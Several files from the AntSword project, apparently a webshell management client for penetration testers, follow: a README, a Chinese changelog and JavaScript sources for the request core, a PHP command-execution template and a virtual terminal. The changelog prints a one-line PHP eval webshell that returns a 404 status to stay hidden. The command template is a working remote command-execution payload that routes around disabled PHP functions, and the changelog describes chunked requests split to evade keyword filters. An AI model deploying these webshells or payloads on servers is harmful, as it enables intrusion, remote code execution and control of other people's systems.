README.md
# AntSword [![release](https://img.shields.io/badge/release-v2.0.7-blue.svg?style=flat-square)][url-release]

> AntSword in your hands, no worries in your mind！

**AntSword is an open source, cross-platform website administration tool, being designed to meet the needs of penetration testers together with security researchers with permissions and/or authorizations as well as webmasters.**

**Anyone shall not use it for illegal purposes and profitability. Besides that, publishing unauthorized modified version is also prohibited, or otherwise bear legal responsibilities.**

This software, of which the development thought is modularization, is intended to provide easy-to-understand codes and modification guidelines for users of different levels. Therefore, any contribution making by everyone to this project is encouraged, whether large or small. By doing so, this tool can be more convenient and consequently become your most powerful kit！

[中文说明][url-doczh] / [Document][url-document] / [Changelog][url-changelog]

## Development stack

- [Electron][url-electron]
- [ES6][url-es6]
- [dhtmlx][url-dhtmlx]
- [Nodejs][url-nodejs]
* And other libraries called in the project.

## Screenshots

![][url-mainui]

<details>

<summary>More Screenshots</summary>

![][url-filemanager]
![][url-terminal]
![][url-database]
![][url-pluginstore]

</details>

## Quick Start

See document: [Quick Start][url-quickstart]

## Contribute

See document: [Make contributions to AntSword][url-contribute]

## Thanks

> Thanks to anyone who made any contributions.

## LICENSE

[LICENSE](./LICENSE)

[url-doczh]: README_CN.md
[url-changelog]: CHANGELOG.md
[url-document]: http://doc.u0u.us/en/
[url-release]: https://github.com/AntSwordProject/AntSword/releases/
[url-electron]: http://electron.atom.io/
[url-es6]: http://es6.ruanyifeng.com/
[url-dhtmlx]: http://dhtmlx.com/
[url-nodejs]: https://nodejs.org/
[url-homepage]: http://uyu.us
[url-release]: https://github.com/AntSwordProject/AntSword/releases
[url-quickstart]: https://doc.u0u.us/en/getting_started/index.html
[url-contribute]: https://doc.u0u.us/en/contribute_docs.html
[url-mainui]: http://as.xuanbo.cc/doc/getting_started/get_antsword_2.jpg
[url-filemanager]: http://as.xuanbo.cc/doc/file_manager/main_page_1.png
[url-terminal]: http://as.xuanbo.cc/doc/terminal/main_page_1.png
[url-database]: http://as.xuanbo.cc/doc/database/main_page_1.png
[url-pluginstore]: http://as.xuanbo.cc/doc/plugin_store/main_page_2.jpg


CHANGELOG.md
# 更新日志
> 有空会补补BUG、添添新功能。    
> 同时也欢迎大家的参与！感谢各位朋友的支持！ .TAT.

## `v(2.0.7.1)`

### 安全更新 (重要)

* Fix toastr 输出时未过滤导致的 xss 漏洞, 由于在 webview 中开启了 nodejs 功能, 可借此引起 RCE #147 (thx @ev0A)

> 为了防止插件中 toastr 出现类似问题, 修改了 toastr 可以输出 html 的特点，以后均不支持输出 html

### 其它

* 修正错别字 #145

## 2019/04/08 `v(2.0.7)`

### 核心

* 执行命令新增 `antsystem` 函数, 具体见: https://github.com/AntSwordProject/ant_php_extension
* Fix 编码器保存后不生效的问题 #135 (thx @K4ngx)
* Fix core download 参数遗漏问题 #142 (thx @RoyTse)
* Fix #141 (thx @RoyTse)

### 虚拟终端

* 新增自定义命令 `aslistcmd`, 列出可使用的命令解释器 (#123)

![aslistcmd.png](https://i.loli.net/2019/04/05/5ca74815a01a4.png)
![aslistcmd_win.png](https://i.loli.net/2019/04/05/5ca74819b276e.png)

* 新增自定义命令 `aspowershell [on|off]`, 开启/关闭 PowerShell 模式

> 如果`ascmd`命令指定的PowerShell解释器文件名中包函`powershell`关键字, 会自动启用 PowerShell 模式, 如下图:

![aspowershell_default](https://i.loli.net/2019/04/05/5ca753673efe7.png)

> 如果指定的 PowerShell 解释器文件名中不包含 `powershell` 关键字, 则需要手动使用该命令，启用 PowerShell 模式。如果关闭了 PowerShell 模式,则会执行出错，如下图:

![aspowershell_switch](https://i.loli.net/2019/04/05/5ca75368d85fa.png)

### 其它

* 修复默认设置保存时导致 bookmarks 清空的问题
* PHP Custom Shell 新增 listcmd 功能
* PHP Custom Shell 新增数据库支持函数检查接口
* 新增「繁體中文(香港)」和「繁體中文(台灣)」两种语言

## 2019/03/20 `v(2.0.6)`

### 后端模块

* 分块传输自动根据黑名单字符(eg: eval, assert, execute, response 等)进行随机切割(thx @phith0n)

### 数据库管理

* 新增「测试连接」功能
* 新增「检测」功能, 检测支持的数据库函数(目前仅 PHP,ASP,ASPX 有效, ASP(X)仅检测使用到的组件是否存在)
* 新增 php `sqlsrv` 连接方式, php5.3之后 mssql 默认不存在,可使用该类型连接 sqlserver >= 2008

> 如果直连shell本地sqlserver, host 部分填 localhost 或者 (local)
>
> 如果连接外部,使用 ip,port

* 新增 php `oracle_oci8` 连接方式, 用于连接 oracle 8i,9i,10g,11g,12c

> host 部分填写: localhost/orcl 或者 localhost:1521/orcl
>
> 参考: http://php.net/manual/zh/function.oci-connect.php  connection_string 部分

* 新增 PHP PostgreSQL 类型数据库操作
* 新增 PHP PostgreSQL_PDO 类型数据库操作 #133 (thx @B0y1n4o4)
* 优化 asp(x) Oracle 类型数据库操作
* 优化 asp(x) SQLServer 类型数据库操作
* 优化SQLServer类型数据库默认查询语句
* php数据管理解析数据时自动猜解编码

### 文件管理

* 新增「在此处打开终端」功能, 打开终端后快速跳到当前目录下
* 新增「全局书签」功能, 可在「系统设置-默认设置」单击鼠标右键添加

![](https://i.loli.net/2019/03/13/5c891b279c26a.png)

![](https://i.loli.net/2019/03/13/5c891b2cc1c30.png)

### 数据管理

* shell 配置页面提示不推荐使用 default、random 编码器, 明文传输 Payload 容易受到转义等影响，未来版本将会考虑移除
* 新增「创建副本」菜单, 复制所选择的 Shell 并在相同分类下创建一个副本
* 新增「搜索数据」功能, 搜索本地数据，范围为当前分类下的 Shell

可选搜索字段： URL(URL地址), Password(密码), Remark(备注), All(在以上几个字段中出现)

> 如果想搜索其它类型的字段, 可直接在类型框中输入想要搜索的字段
>
> 例如搜索 IP地址, 可在搜索字段选择框中输入: ip
>
> 具体字段类型名请直接查阅 antData/db.ant

唤醒快捷键 Ctrl+Shift+F 或者 Command + Shift + F (OSX)

退出:

1) 点击搜索框之外的任何区域

2) 按下 `ESC` 键

3) 再次按下唤醒快捷键

> 在使用快捷键时,如果当前活动 tab 不是数据管理，则会自动跳回数据管理

### 其它

* 新增 「JSP Custom Shell For Oracle」
* 新增 Decodes 自动猜解编码,在中文少量的情况下,成功率会降低
* 系统托盘新增「重启应用」菜单
* 虚拟终端打开后提示本地命令菜单 ashelp

### BugFix

* 修复 asp(x) sqlserver 获取列名,执行自定义SQL语句的异常
* 修复 php mssql 获取列名,执行自定义SQL语句异常

## 2019/03/04 `v(2.0.5)`

### 后端模块

* 新增 chunked 流式传输

![chunk-2.png](https://i.loli.net/2019/01/28/5c4e8869c83ae.png)

### Shell 管理

* 新增「测试连接」功能
* 其它设置增加「开启分块传输」开关，设置「最小分块」和「最大分块」。每次分块大小为[n, m]区间。

![chunk-1.png](https://i.loli.net/2019/01/28/5c4e8868f178a.png)

### 文件管理

* 编辑文件标签打开时显示正在编辑的文件的「IP地址」和「绝对路径」 (#129)
* 编辑文件「保存」按钮移动到右侧

### 插件市场

* 支持使用代理访问插件市场,当配置了代理之后，默认开启

### 浏览网站

* 新增代理开关, 在配置了代理之后，可通过该开关控制是否使用代理浏览目标网站

### Other

* 调整 aproxy uri 初始化 URL 格式

## 2019/01/21 `v(2.0.4)`

### 后端模块

 * 优化返回包解码流程,增加自动猜解编码功能,该功能在中文较少时容易出错,出错了使用用户设置的字符编码

### 文件管理

 * 编辑文件窗口将「编码」按钮替换为「用此编码打开」, 若打开文件之后乱码，不妨试试切换编码
 * 新增「复制文件名」和「复制文件路径」功能，目标复制文件名或路径到剪贴板
 * 编辑文件菜单可选择「标签打开」和「窗口打开」

### 虚拟终端

 * 新增两条本地命令
  * ashelp 列出所有本地命令
  * ascmd  指定某个文件执行后续的命令. eg: ascmd /bin/bash 这样后续输入的命令将会使用 /bin/bash 来执行。注意仅对当前有效, 如果需要持久生效, 需要在shell配置中的「其它配置」设置。

### 系统设置

 * 新增「默认设置」, 可在此配置文件管理默认编辑文件打开方式

### Other

 * 新增 Python2 Custom CGI shell 示例

### BugFix

 * 修复Linux中编码设置中找到不到路径的问题 (#117) thx @H1d3r
 * 修复 Windows shell 盘符小写引起文件管理目录树错乱的 Bug
 * 修复 ASP 文件创建失败和删除失败时提示

### 插件

#### ASRedis

* 新增「虚拟命令行」功能

 ![](https://i.loli.net/2019/01/16/5c3f2134dcd8f.png)

## 2018/12/25 `(v2.0.3)`

### 模块增强

#### Shell 管理

 * 添加 Shell 时 URL 默认前缀 `http://`
 * 添加 Shell 时根据文件后缀选择 Shell 类型并赋予默认编码(asp 默认 GBK, 其它默认 UTF8) #109
 * 其它配置新增 `Multipart 发包` 功能

#### 后端模块

 * 数据存储新增插件配置存储管理功能 (`shell-addPluginDataConf`, `shell-editPluginDataConf`, `shell-delPluginDataConf`, `shell-getPluginDataConf`)
 * 后台发包方式支持 `Multipart`, 可在「编辑Shell配置」-「其它配置」里选择是否开启此功能，默认关闭。(thx @phith0n)

### Bug Fix

 * 修复数据库编码无法保存的 Bug (#110 thx @Twi1ight)
 * 修复 PHP Mysql(i) 数据管理模版代码中编码设置部分的错误 (#110 thx @Twi1ight)

### Other

 * 自动检查更新每24小时触发一次(GitHub 访问频率限制)
 * 插件市场默认窗口大小调整
 * Loading 界面增加了圣诞节彩蛋, 偶尔跟风过个节 🎄 Merry Christmas 🎄

## 2018/12/05 `(v2.0.2)`

### 模块增强

#### Shell 管理

 * 可在 Shell 编辑数据窗口下的`其它设置`栏目下自定义上传文件分片大小 (默认为 500KB, 太大会导致 HTTP 413 错误)

#### 文件管理

 * PHP Shell 下可直接修改文件权限, 显示为4位 8进制数, 如 `0644`

#### 数据管理
 
 * 优化了查询结果显示，默认所有列宽为 100
 * 可将查询结果导出为 CSV 文件
 * PHP Shell MySQL 数据库可视化增强，支持`新建数据库`,`删除数据库`,`新建表`,`修改表名`,`删除表`,`编辑列名`,`删除列`

#### 虚拟终端

 * 虚拟终端界面下使用 `Ctrl` + `=`(和`+`在一起的那个键) 可放大, `Ctrl` + `-` 可缩小

#### 浏览网站

 * 新增了地址栏, 面对需要先进入登录页面的 Shell, 可先在此处访问 login 页面，然后保存 Cookie 到 Shell 配置。 默认为 Shell 的 URL
 * 调整了工具栏按钮的排列
 * 关闭了默认自动打开 URL,需要手动点击「浏览」按钮

### Bug Fix

 * 修正 windows 客户端下用户编码器路径解析错误的问题

### Other

 * 数据分割符随机化，再也不是之前固定的 `->|` 和 `|<-` 了
 * 支持返回状态为 404, 500, 403 等非 200 的 Shell (#103 thx @Curz0n)，一个简单的例子如下：
  
  ```
    <?php http_response_code(404);@eval($_POST['ant']);?>
  ```

 * JSP Shell 基础信息调整, 现在默认的目录为 shell 编译后的 class 文件所在目录
 * 关于页面新增 [Discord 在线交流地址](https://discord.gg/Uzh5nUf)

## 2018/09/12 `(v2.0.1)`

### 插件

* 新增 [「LiveScan」](https://github.com/virink/LiveScan) 插件 (Author: @virink)

 > Webshell存活弹出插件

 1. 通过请求 Webshell 并判断返回数据是否一致判断 Webshell 是否存活
 2. 仅对 PHP,ASP,ASPX 有效
 3. 一键将失联的 Webshell 移动到 `[.Trash]` 分类
 4. 一键清空 `[.Trash]` 分类

### Bug Fix

* 修正下载更新时 chunk 导致进度条显示问题
* 修正 Windows 客户端用户自定义编码器加载问题
* 修正 C 盘无权限目录显示的 Bug(#51)
* 修正 Windows 客户端下上传文件路径截取问题(#97 thx @jjf012)
* 修正 Linux 客户端载入源码路径错误的问题 (cbb67dd0)
* 修正 Windows 服务器修改文件时间失败问题(#98 thx @jjf012)
* 修正 ASP Access 数据库显示数据库失败问题

### Other


source/core/base.js
/**
 * 中国蚁剑::核心模块::基础函数库
 * 开写：2016/04/12
 * 更新：-
 * 作者：蚁逅 <https://github.com/antoor>
 */
'use strict';

const iconv = require('iconv-lite');

class Base {

  /**
   * 初始化
   * @param  {Object} opts 配置对象
   * @return {Object}      this
   */
  constructor(opts) {
    // 默认配置
    opts['encode'] = opts['encode'] || 'utf8';
    opts['encoder'] = opts['encoder'] || 'default';
    this.__opts__ = opts;

    this['__encoder__'] = {
      /**
       * 默认编码器
       * @param  {String} pwd  连接密码
       * @param  {Object} data 请求数据
       * @return {Object}      生成数据
       */
      default(pwd, data) {
        data[pwd] = data['_'];
        delete data['_'];
        return data;
      },
      /**
       * 随机编码器
       * @param  {String} pwd  连接密码
       * @param  {Object} data 请求数据
       * @return {Object}      生成数据
       */
      random(pwd, data) {
        let _encoders = [];
        for (let _ in this) {
          if (_ === 'random') { continue }
          _encoders.push(_);
        }
        let _index = parseInt(Math.random() * _encoders.length);
        return this[
          _encoders[_index]
        ](pwd, data);
      }
    }
    // 解析自定义编码器
    this.user_encoders.map((_)=>{
      this.parseEncoder(`${_}`);
    });
  }

  /**
   * 返回参数列表
   * @return {array} [arg1, arg2, arg3..]
   */
  argv() {
    // 生成一个随机的变量名
    let random = () => `0x${(Math.random() + Math.random()).toString(16).substr(2)}`;
    // 返回六个随机变量名数组
    return [
      random(), random(), random(),
      random(), random(), random()
    ];
  }

  /**
   * 字符串格式化处理
   * 使用方法：const format = new format()
   * @param  {String} encode [字符串编码，默认utf8]
   * @return {Object}        [返回字符串处理函数对象]
   */
  format(encode) {
    return {
      /**
       * base64编码
       * @param  {String} str 字符串
       * @return {String}     编码后的字符串
       */
      base64(str) {
        return new Buffer(
          iconv.encode(new Buffer(str), encode)
        ).toString('base64');
      },
      /**
       * 字符串转16进制（不进行编码转换
       * @param  {String} str 转换的字符串
       * @return {Buffer}     转换完成的buffer
       */
      buffer(str) {
        return new Buffer(str).toString('hex').toUpperCase();
      },
      /**
       * 字符串转16进制（进行编码转换
       * @param  {String} str 转换的字符串
       * @return {Buffer}     转换完成的buffer
       */
      hex(str) {
        return new Buffer(
          iconv.encode(new Buffer(str), encode)
        ).toString('hex').toUpperCase();
      }
    }
  }

  /**
   * 解析脚本模板
   * @param  {String} tpl 模板文件
   * @return {Object}     解析完毕的模板对象（参数`_`为主代码入口
   */
  parseTemplate(tpl) {
    // 把模板路径的`/`转换为`_`
    let templateName = (tpl.split('template/')[1]).replace(/\//g, '_');
    this[templateName] = {};
    // 加载模板
    let _argv = this.argv();
    let templateObj = require(`${tpl}`)(
      _argv[0], _argv[1], _argv[2],
      _argv[3], _argv[4], _argv[5]
    );
    // let formatter = new this.format(this.__opts__['encode']);
    let formatter = Base.prototype.format(this.__opts__['encode']);
    // 解析模板
    for (let funcName in templateObj) {
      this[templateName][funcName] = (
        (args) => {
          if (typeof(args) === 'object') {
            // 如果脚本函数需要参数，则进行解析
            return (argv) => {
              let data = {};
              // 克隆源数据到返回数据中
              for (let _ in args) {
                data[_] = args[_];
              }
              // 循环替换脚本中的标签
              for (let arg in args) {
                (args[arg].match(/#{([\w\:]+)}/g) || []).map(
                  // example: #{hex::str} = hex(str), #{arg1} = arg1
                  (tag) => {
                    let tagStr = tag.substr(2, tag.length - 3);
                    let tagArr = tagStr.split('::');
                    let func, retStr;
                    if (
                      (tagArr.length > 0) &&
                      (func = formatter[tagArr[0]])
                    ) {
                      // 如果包含有分割标签且该格式化函数存在，则调用该函数进行处理
                      retStr = func( argv[tagArr[1] || ''] );
                    } else {
                      // 否则替换直接返回字符串
                      retStr = argv[tagStr] || '';
                    }
                    // 组合最终生成模板代码
                    data[arg] = args[arg].replace(tag, retStr);
                  }
                )
              }
              // 发送HTTP请求
              return data;
            }
          } else {
            // 否则直接返回
            return () => ({ _: args });
          }
        }
      )(templateObj[funcName]);
    }
  }

  /**
   * 解析编码器
   * ? 编码器其实模板返回的脚本对象进行编码处理，主要就是把脚本模板中的`_`主变量改为用户传递的密码
   * @param  {String} enc 编码器文件
   * @return {Object}     编码器处理函数对象
   */
  parseEncoder(enc) {
    // 加载编码器
    // https://github.com/AntSwordProject/antSword/issues/135#issuecomment-475842870
    delete require.cache[require.resolve(`${enc}`)];
    // QAQ！我也不知道为什么，如果直接require变量名，babel编译就会warning，so我只好加个`咯～
    this['__encoder__'][enc.indexOf(`encoder/`) > -1 ? enc.split(`encoder/`)[1]:enc.split(`encoder\\`)[1]] = require(`${enc}`);
  }

  /**
   * 编码处理并返回操作
   * @param  {String} tag_s 前截断符
   * @param  {String} tag_e 后截断符
   * @param  {Object} data  源POST数据
   * @return {Object}       最终生成数据// 将返回三个参数对象：tag_s,tag_e,data
   */
  encodeComplete(tag_s, tag_e, data) {
    // 编码器处理
    let finalData = this.__encoder__[this.__opts__['encoder']](
      this.__opts__['pwd'],
      data
    );
    return {
      'tag_s': tag_s,
      'tag_e': tag_e,
      'data': finalData
    };
  }

  /**
   * HTTP请求函数
   * ? 用法：core.request(core.base.info()).then((ret) => {}).catch((e) => {})..
   * @param  {Object} code          请求源数据
   * @param  {Function} chunkCallBack 二进制流回调函数，可选
   * @return {Promise}               Promise操作对象
   */
  request(code, chunkCallBack) {
    const opt = this.complete(code);
    return new Promise((res, rej) => {
      // 随机ID(用于监听数据来源)
      const hash = (String(+new Date) + String(Math.random())).substr(10, 10).replace('.', '_');
      // 监听数据返回
      antSword['ipcRenderer']
        // 请求完毕返回数据{text,buff}
        .once(`request-${hash}`, (event, ret) => {
          return res({
            'encoding': ret['encoding']||"",
            'text': ret['text'],
            'buff': ret['buff']
          });
        })
        // HTTP请求返回字节流
        .on(`request-chunk-${hash}`, (event, ret) => {
          return chunkCallBack ? chunkCallBack(ret) : null;
        })
        // 数据请求错误
        .once(`request-error-${hash}`, (event, ret) => {
          return rej(ret);
        })
        // 发送请求数据
        .send('request', {
          url: this.__opts__['url'],
          hash: hash,
          data: opt['data'],
          tag_s: opt['tag_s'],
          tag_e: opt['tag_e'],
          encode: this.__opts__['encode'],
          ignoreHTTPS: (this.__opts__['otherConf'] || {})['ignore-https'] === 1,
          useChunk: (this.__opts__['otherConf'] || {})['use-chunk'] === 1,
          chunkStepMin: (this.__opts__['otherConf'] || {})['chunk-step-byte-min'] || 2,
          chunkStepMax: (this.__opts__['otherConf'] || {})['chunk-step-byte-max'] || 3,
          useMultipart: (this.__opts__['otherConf'] || {})['use-multipart'] === 1,
          timeout: parseInt((this.__opts__['otherConf'] || {})['request-timeout']),
          headers: (this.__opts__['httpConf'] || {})['headers'] || {},
          body: (this.__opts__['httpConf'] || {})['body'] || {}
        });
    })
  }

  /**
   * 文件下载专用函数（因有些文件过大，导致Electron出错
   * @param  {String} savePath         保存文件路径
   * @param  {Object} postCode         提交数据
   * @param  {Function} progressCallback 进度回调
   * @return {Promise}                  Promise操作对象
   */
  download(savePath, postCode, progressCallback) {
    const opt = this.complete(postCode);
    return new Promise((ret, rej) => {
      // 随机ID(用于监听数据来源)
      const hash = (String(+new Date) + String(Math.random())).substr(10, 10).replace('.', '_');
      // 监听数据返回
      antSword['ipcRenderer']
        // 请求完毕返回数据(size)
        .once(`download-${hash}`, (event, size) => {
          return ret(size);
        })
        // HTTP请求返回字节流大小
        .on(`download-progress-${hash}`, (event, size) => {
          return progressCallback ? progressCallback(size) : null;
        })
        // 数据请求错误
        .once(`download-error-${hash}`, (event, ret) => {
          throw new Error(ret);
        })
        // 发送请求数据
        .send('download', {
          url: this.__opts__['url'],
          hash: hash,
          path: savePath,
          data: opt['data'],
          tag_s: opt['tag_s'],
          tag_e: opt['tag_e'],
          ignoreHTTPS: (this.__opts__['otherConf'] || {})['ignore-https'] === 1,
          useMultipart: (this.__opts__['otherConf'] || {})['use-multipart'] === 1,
          encode: this.__opts__['encode']
        });
    })
  }
}

// export default Base;
module.exports = Base;


source/core/php/template/command.js
/**
 * 虚拟终端命令执行
 */

module.exports = (arg1, arg2) => ({
  exec: {
    _:
      `$p=base64_decode($_POST["${arg1}"]);
      $s=base64_decode($_POST["${arg2}"]);
      $d=dirname($_SERVER["SCRIPT_FILENAME"]);
      $c=substr($d,0,1)=="/"?"-c \\"{$s}\\"":"/c \\"{$s}\\"";
      $r="{$p} {$c}";
      function fe($f){$d=explode(",",@ini_get("disable_functions"));
        if(empty($d)){
          $d=array();
        }else{
          $d=array_map('trim',array_map('strtolower',$d));
        }
        return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));
      };
      function runcmd($c){
        $ret=0;
        if(fe('system')){
          @system($c,$ret);
        }elseif(fe('passthru')){
          @passthru($c,$ret);
        }elseif(fe('shell_exec')){
          print(@shell_exec($c));
        }elseif(fe('exec')){
          @exec($c,$o,$ret);
          print(join("\n",$o));
        }elseif(fe('popen')){
          $fp=@popen($c,'r');
          while(!@feof($fp)){
            print(@fgets($fp, 2048));
          }
          @pclose($fp);
        }elseif(fe('antsystem')){
          @antsystem($c);
        }else{
          $ret = 127;
        }
        return $ret;
      };
      $ret=@runcmd($r." 2>&1");
      print ($ret!=0)?"ret={$ret}":"";`.replace(/\n\s+/g, ''),
    [arg1]: "#{base64::bin}",
    [arg2]: "#{base64::cmd}"
  },

  quote: {
    _:
      `$p=base64_decode($_POST["${arg1}"]);$s=base64_decode($_POST["${arg2}"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \\"{$s}\\"":"/c \\"{$s}\\"";$r="{$p} {$c}";echo \`{$r} 2>&1\``,
    [arg1]: "#{base64::bin}",
    [arg2]: "#{base64::cmd}"
  }
})


source/modules/terminal/index.js
/**
 * 虚拟终端模块
 * 更新：2016/04/13
 * 作者：蚁逅 <https://github.com/antoor>
 */

const LANG = antSword['language']['terminal'];
const LANG_T = antSword['language']['toastr'];

class Terminal {

  constructor(opts, options={}) {
    // 生存一个随机ID，用于标识多个窗口dom
    const hash = String(Math.random()).substr(2, 10);

    // 初始化UI::tabbar
    const tabbar = antSword['tabbar'];
    tabbar.addTab(
      `tab_terminal_${hash}`,
      `<i class="fa fa-terminal"></i> ${opts['ip']}`,
      null, null, true, true
    );
    tabbar.attachEvent('onTabClick', (id,lid) => {
      if (id !== `tab_terminal_${hash}`) { return };
      this.term ? this.term.focus() : 0;
    });
    // 初始化UI::cell
    const cell = tabbar.cells(`tab_terminal_${hash}`);
    cell.attachHTMLString(`
      <div
        id="div_terminal_${hash}"
        style="height:100%;margin:0;padding:0 5px 1px 5px;overflow:scroll;--size:1;"
      ></div>
    `);

    this.path = '';
    this.opts = opts;
    this.options = options || {};
    this.hash = hash;
    this.term = null;
    this.cell = cell;
    this.isWin = true;
    this.sessbin = null;
    this.core = new antSword['core'][opts['type']](opts);
    this.cache = new antSword['CacheManager'](this.opts['_id']);

    this
      .getInformation()
      .then((ret) => {
        this.initTerminal(ret['info'], ret['dom']);
        if(this.options.hasOwnProperty("path")) {
          if(this.isWin && this.path.substr(0,1).toUpperCase() != this.options.path.substr(0,1).toUpperCase()) {
            this.term.exec(`${this.options.path.substr(0,1).toUpperCase()}:`);
          }
          this.term.exec(`cd ${this.options.path}`);
        }
      })
      .catch((err) => {
        toastr.error((typeof(err) === 'object') ? JSON.stringify(err) : String(err), LANG_T['error']);
        this.cell.progressOff();
        this.cell.close();
      })
  }

  /**
   * 获取目标信息
   * @return {Promise} 返回一个Promise操作对象//{dom,info}
   */
  getInformation() {
    return new Promise((ret, rej) => {
      // 获取DOM
      const dom = $(`#div_terminal_${this.hash}`);
      // 获取缓存
      let infoCache = this.cache.get('info');
      // 如果有缓存？初始化终端：获取信息&&保存缓存&&初始化终端
      if (infoCache) {
        return ret({
          dom: dom,
          info: infoCache
        });
      }
      // 开始获取信息
      this.cell.progressOn();
      this.core.request(
        this.core.base.info()
      ).then((_ret) => {
        this.cell.progressOff();
        this.cache.set('info', _ret['text']);
        return ret({
          dom: dom,
          info: _ret['text']
        });
      }).catch((e) => {
        rej(e);
      });
    });
  }

  /**
   * 初始化终端
   * @param  {String} ret 目标信息
   * @param  {Object} dom 要操作的dom元素
   * @return {None}     [description]
   */
  initTerminal(ret, dom) {
    let self = this;
    let info = ret.split('\t');
    let infoUser, infoPath, infoDrive, infoSystem;
    let banner = `[[b;cyan;](*) ${LANG['banner']['title']}]`;

    // 判断数据是否正确
    if (info.length === 4) {
      infoPath = info[0];
      infoDrive = info[1];
      infoSystem = info[2];
      infoUser = info[3];
    } else if (info.length === 2) {
      infoPath = info[0];
      infoDrive = info[1];
    } else {
      toastr.error('Loading infomations failed!<br/>' + ret, LANG_T['error']);
      this.cache.del('info');
      return this.cell.close();
    }

    // 转换路径特殊字符
    infoPath = infoPath.replace(/\\/g, '/').replace(/\.$/, '');

    // 判断是否为!win
    this.isWin = !(infoPath.substr(0, 1) === '/')
    this.path = infoPath;

    // 组合banner
    banner += `\n[[b;#99A50D;]${LANG['banner']['path']}]: [[;#C3C3C3;]${infoPath}]`;
    banner += `\n[[b;#99A50D;]${LANG['banner']['drive']}]: [[;#C3C3C3;]${infoDrive}]`;
    if (info.length === 4) {
      banner += `\n[[b;#99A50D;]${LANG['banner']['system']}]: [[;#C3C3C3;]${infoSystem}]`;
      banner += `\n[[b;#99A50D;]${LANG['banner']['user']}]: [[;#C3C3C3;]${infoUser}]`;
    }

    // 初始化终端
    this.term = dom.terminal( (cmd, term) => {
      if (!cmd) { return false }
      // 如果为exit||quit则关闭窗口
      if (cmd === 'exit' || cmd === 'quit') { return this.cell.close() }
      // clear清空
      if (cmd === 'cls' || cmd === 'clear') { return term.clear() }
      
      if (cmd === 'ashelp'){
        term.echo(LANG['ascmd']['ashelp']);
        return;
      }
      if ( cmd.substr(0,5) === 'ascmd') {
        var sessbin = cmd.substr(5).trim();
        if(sessbin.length>0){
          self.sessbin = sessbin;
          term.echo(LANG['ascmd']['ascmd'](self.sessbin));
        }else{
          term.echo(LANG['ascmd']['ashelp']);
        }
        return;
      }
      term.pause();
      // 是否有缓存
      let cacheTag = 'command-' + new Buffer(this.path + cmd).toString('base64');
      let cacheCmd = this.cache.get(cacheTag);
      if (
        (this.opts.otherConf || {})['terminal-cache'] === 1 && cacheCmd
      ) {
        term.echo(
          antSword.noxss(cacheCmd, false)
        );
        return term.resume();
      };
      // 获取自定义执行路径
      let _bin = this.isWin ? 'cmd' : '/bin/sh';
      let _confBin = (this.opts['otherConf'] || {})['command-path'];
      _bin = _confBin || _bin;
      if(self.sessbin !== null) {
        _bin = self.sessbin;
      }
      // 开始执行命令
      this.core.request(
        this.core.command.exec({
          cmd: this.parseCmd(cmd, this.path),
          bin: _bin
        })
      ).then((ret) => {
        let _ = ret['text'];
        // 解析出命令执行路径
        const indexS = _.lastIndexOf('[S]');
        const indexE = _.lastIndexOf('[E]');
        let _path = _.substr(indexS + 3, indexE - indexS - 3);

        let output = _.replace(`[S]${_path}[E]`, '');
        _path = _path.replace(/\n/g, '').replace(/\r/g, '');

        this.path = _path || this.path;
        term.set_prompt(this.parsePrompt(infoUser));

        // 去除换行符
        [
          /\n\n$/, /^\n\n/, /\r\r$/,
          /^\r\r/, /\r\n$/, /^\r\n/,
          /\n\r$/, /^\n\r/, /\r$/,
          /^\r/, /\n$/, /^\n/
        ].map((_) => {
          output = output.replace(_, '');
        });
        if (output.length > 0) {
          term.echo(
            antSword.noxss(output, false)
          );
          // 保存最大100kb数据
          if (output.length < (1024 * 1024)) {
            this.cache.set(cacheTag, output);
          };
        };
        term.resume();
      }).catch((_) => {
        // term.error('ERR: ' + (_ instanceof Object) ? JSON.stringify(_) : String(_));
        term.resume();
      });
    }, {
        greetings: banner,
        name: `terminal_${this.hash}`,
        prompt: this.parsePrompt(infoUser),
        numChars: 2048,
        exit: false,
        // < 1.0.0 时使用3个参数 completion: (term, value, callback) => {}
        completion: (value, callback) => {
          callback([
            'ashelp', 'ascmd', 'quit', 'exit'
          ].concat(
            this.isWin ? [
              'dir', 'whoami', 'net', 'ipconfig', 'netstat', 'cls',
              'wscript', 'nslookup', 'copy', 'del', 'ren', 'md', 'type',
              'ping'
            ] : [
              'cd', 'ls', 'find', 'cp', 'mv', 'rm', 'ps', 'kill',
              'file', 'tar', 'cat', 'chown', 'chmod', 'pwd', 'history',
              'whoami', 'ifconfig', 'clear',
              'ping'
            ]
          ))
        },
        keydown: (event, terminal) => {
          if(event.ctrlKey == true) {
            // ctrl 键按下
            switch(event.keyCode) {
              case 187: // 放大 ctrl +
                var s = parseFloat(terminal[0].style.getPropertyValue("--size"));
                if(isNaN(s)){
                  s = 1;
                }
                if(s<5){
                  s += 0.05;
                }
                terminal[0].style.setProperty("--size", s);
                return false;
              case 189: // 缩小 ctrl -
                var s = parseFloat(terminal[0].style.getPropertyValue("--size"));
                if(isNaN(s)){
                  s = 1;
                }
                if(s>0.5){
                  s -= 0.05;
                }
                terminal[0].style.setProperty("--size", s);
                return false;
              default:
              break;
            }
          }
        }
    });
    this.term.echo(`[[b;cyan;](*) ${LANG['ascmd']['help']}]`);
  }

  /**
   * 根据执行命令&&路径生成最终command
   * @param  {String} cmd  要执行的命令
   * @param  {String} path 当前路径
   * @return {String}      最终执行命令
   */
  parseCmd(cmd, path) {
    path = path.replace(/\\\\/g, '\\').replace(/"/g, '\\"').replace(/\\/g, '\\\\');
    return (this.isWin
      ? `cd /d "${path}"&${cmd}&echo [S]&cd&echo [E]`
      : `cd "${path}";${cmd};echo [S];pwd;echo [E]`
    );
  }

  /**
   * 生成路径提示符
   * @param  {String} user 当前用户名
   * @return {String}      term输出字符串
   */
  parsePrompt(user) {
    return antSword.noxss(this.isWin
      ? `[[b;white;]${this.path.replace(/\//g, '\\')}> ]`
      : (user ? `([[b;#E80000;]${user}]:[[;#0F93D2;]` : '[[;0F93D2;]') + this.path + ']) $ '
    );
  }

}

// export default Terminal;
module.exports = Terminal;
